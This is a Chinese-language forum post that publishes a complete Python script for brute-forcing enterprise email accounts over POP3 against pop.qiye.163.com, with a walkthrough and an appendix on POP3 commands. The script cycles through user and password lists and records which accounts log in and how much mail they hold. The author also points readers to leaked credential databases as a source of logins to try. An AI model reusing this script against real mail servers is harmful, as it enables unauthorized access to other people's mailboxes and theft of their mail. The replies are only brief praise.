请选择 进入手机版 | 继续访问电脑版

技术控

    今日:185| 主题:54140
收藏本版 (1)
最新软件应用技术尽在掌握

[其他] Python 邮箱爆破

[复制链接]
蛋撻,大叔 发表于 2016-10-3 17:16:49
383 9

立即注册CoLaBug.com会员,免费获得投稿人的专业资料,享用更多功能,玩转个人品牌!

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
按照师傅给的任务,写了一个企业邮箱的爆破脚本,后续还有FTP,SSH等一些爆破的脚本。
  我先说下整体思路:
  总体就是利用python的poplib模块来从pop3服务器上交互,根据获取的相关信息,产生结果。POP3协议并不复杂,它也是采用的一问一答式的方式,你向服务器发送一个命令,服务器必然会回复一个信息.
  
       
  • 首先验证参数是否正确
    Sys.argv[]是用来获取命令行参数的,sys.argv[0]表示代码本身文件路径,所以参数从1开始   
  • 然后从用户密码文件中读取信息   
  • pop.getwelcome()用来获取连接服务器的响应状态   
  • 然后就是脚本的核心代码部分
    1. server = "pop.qiye.163.com" //设置pop3服务器地址
    2. pop = poplib.POP3(server,110) //连接pop3服务器
    3. pop.user(user) //验证用户名
    4. auth = pop.pass_(passwd) //验证密码
    5. if auth.split(' ')[0]== "+OK": //判断响应的结果是否“OK”
    6. pring user,passwd
    复制代码
      
  • 最后输出出来相关的用户信息
      
  脚本代码如下:
  1. #!/usr/bin/python
  2. # -*- coding: UTF-8 -*-
  3. '''
  4. @Author:joy_nick
  5. @博客:http://byd.dropsec.xyz/
  6. @Email Pop3 Brute Forcer
  7. '''
  8. import threading, time, random, sys, poplib
  9. from copy import copy
  10. if len(sys.argv) !=3:
  11. print "\t --------------------------------------------------\n"
  12. print "\t Usage: ./Emailpopbrute.py <userlist> <passlist>\n"
  13. sys.exit(1)
  14. server = "pop.qiye.163.com"
  15. success = []
  16. try:
  17. users = open(sys.argv[1], "r").readlines()
  18. except(IOError):
  19. print "[-] Error: urerlist打开失败!\n"
  20. sys.exit(1)
  21. try:
  22. words = open(sys.argv[2], "r").readlines()
  23. except(IOError):
  24. print "[-] Error: passlist打开失败!\n"
  25. sys.exit(1)
  26. try:
  27. pop = poplib.POP3(server,110)
  28. welcome = pop.getwelcome()
  29. print welcome
  30. pop.quit()
  31. except (poplib.error_proto):
  32. welcome = "No Response"
  33. pass
  34. def mailbruteforce(listuser,listpwd):
  35. if len(listuser) < 1 or len(listpwd) < 1 :
  36. print "An error occurred: No user or pass list"
  37. return 1
  38. for user in listuser:
  39. for value in listpwd :
  40. user = user.replace("\n","")
  41. value = value.replace("\n","")
  42. try:
  43. print "-"*12
  44. print "[+] User:",user,"Password:",value
  45. time.sleep(1)
  46. pop = poplib.POP3(server,110)
  47. pop.user(user)
  48. auth = pop.pass_(value)
  49. print auth
  50. if auth.split(' ')[0]!= "+OK" :
  51. pop.quit()
  52. print "unknown error !"
  53. continue
  54. if pop.stat()[1] is None or pop.stat()[1] < 1 :
  55. pop.quit()
  56. print "获取信息失败!"
  57. continue
  58. ret = (user,value,pop.stat()[0],pop.stat()[1])
  59. success.append(ret)
  60. pop.quit()
  61. break
  62. except:
  63. #print "An error occurred:", msg
  64. pass
  65. print "\t --------------------------------------------------\n"
  66. print "[+] Server:",server
  67. print "[+] Port: 995"
  68. print "[+] Users Loaded:",len(users)
  69. print "[+] Words Loaded:",len(words)
  70. print "[+] Server response:",welcome,"\n"
  71. mailbruteforce(users,words)
  72. print "\t[+] have weakpass :\t",len(success)
  73. if len(success) >=1:
  74. for ret in success:
  75. print "\n\n[+] Login successful:",ret[0], ret[1]
  76. print "\t[+] Mail:",ret[2],"emails"
  77. print "\t[+] Size:",ret[3],"bytes\n"
  78. print "\n[-] Done"
复制代码
测试结果:
   

Python 邮箱爆破

Python 邮箱爆破

   说明:
  [email protected][email protected]@[email protected]邮箱的账号密码,也就没测试成功的,要是感兴趣,可以搜一下相关社工裤。
  附:

  python 中 os._exit(), sys.exit(), exit() 的区别是什么?

  
       
  • sys.exit(n) 退出程序引发一个SystemExit异常, 可以捕获异常执行些清理工作. n默认值为0, 表示正常退出. 其他都是非正常退出. 没有捕获这个异常,会直接退出;捕获这个异常可以做一些额外的清理工作。 一般主程序中使用此退出   
  • os._exit(n), 直接退出 Python 解释器,其后的代码都不执行, 不抛异常, 不执行相关清理工作. 常用在子进程的退出.   
  • exit() 跟 C 语言等其他语言的 exit() 应该是一样的  
  pop3收取邮件的过程一般是:

  
       
  • 连接pop3服务器 (poplib.POP3.__init__)   
  • 发送用户名和密码进行验证 (poplib.POP3.user poplib.POP3.pass_)   
  • 获取邮箱中信件信息 (poplib.POP3.stat)   
  • 收取邮件 (poplib.POP3.retr)   
  • 删除邮件 (poplib.POP3.dele)   
  • 退出 (poplib.POP3.quit)  
  1. 命令 poplib方法 参数 状态 描述
  2. -----------------------------------------------------------------------------------------------
  3. USER user username 认可 用户名,此命令与下面的pass命令若成功,将导致状态转换
  4. PASS pass_ password 认可 用户密码
  5. APOP apop Name,Digest 认可 Digest是MD5消息摘要
  6. -----------------------------------------------------------------------------------------------
  7. STAT stat None 处理 请求服务器发回关于邮箱的统计资料,如邮件总数和总字节数
  8. UIDL uidl [Msg#] 处理 返回邮件的唯一标识符,POP3会话的每个标识符都将是唯一的
  9. LIST list [Msg#] 处理 返回邮件数量和每个邮件的大小
  10. RETR retr [Msg#] 处理 返回由参数标识的邮件的全部文本
  11. DELE dele [Msg#] 处理 服务器将由参数标识的邮件标记为删除,由quit命令执行
  12. RSET rset None 处理 服务器将重置所有标记为删除的邮件,用于撤消DELE命令
  13. TOP top [Msg#] 处理 服务器将返回由参数标识的邮件前n行内容,n必须是正整数
  14. NOOP noop None 处理 服务器返回一个肯定的响应
复制代码



上一篇:More Comments on Code Comments
下一篇:The Elements of Modern Java Style
听寒 发表于 2016-10-11 22:25:25
以后要跟蛋撻,大叔好好学习学习!
回复 支持 反对

使用道具 举报

共赢天下 发表于 2016-10-15 10:27:03
再过一遍。。。
回复 支持 反对

使用道具 举报

fwererdfe 发表于 2016-10-18 16:29:18
开往春天的坦克!
回复 支持 反对

使用道具 举报

刚刚55557777 发表于 2016-10-20 14:01:07
谢谢蛋撻,大叔的分享!
回复 支持 反对

使用道具 举报

阿桑 发表于 2016-10-20 19:56:39
火前留名,前排占座,此楼出租,欢迎议价。
回复 支持 反对

使用道具 举报

傲云 发表于 2016-10-24 18:36:10
直播,握手!稍坐,楼主马上来!
回复 支持 反对

使用道具 举报

bhi001 发表于 2016-10-25 20:35:00
绘一场生死契阔的游戏,为我们的故事写一个结局。
回复 支持 反对

使用道具 举报

brightUFO 发表于 2016-10-25 21:23:42
鸟大了什么林子都有。。
回复 支持 反对

使用道具 举报

末了余味 发表于 2016-11-18 20:46:44
内容很有深度!
回复 支持 反对

使用道具 举报

*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

我要投稿

推荐阅读


回页顶回复上一篇下一篇回列表
手机版/CoLaBug.com ( 粤ICP备05003221号 | 文网文[2010]257号 )

© 2001-2017 Comsenz Inc. Design: Dean. DiscuzFans.

返回顶部 返回列表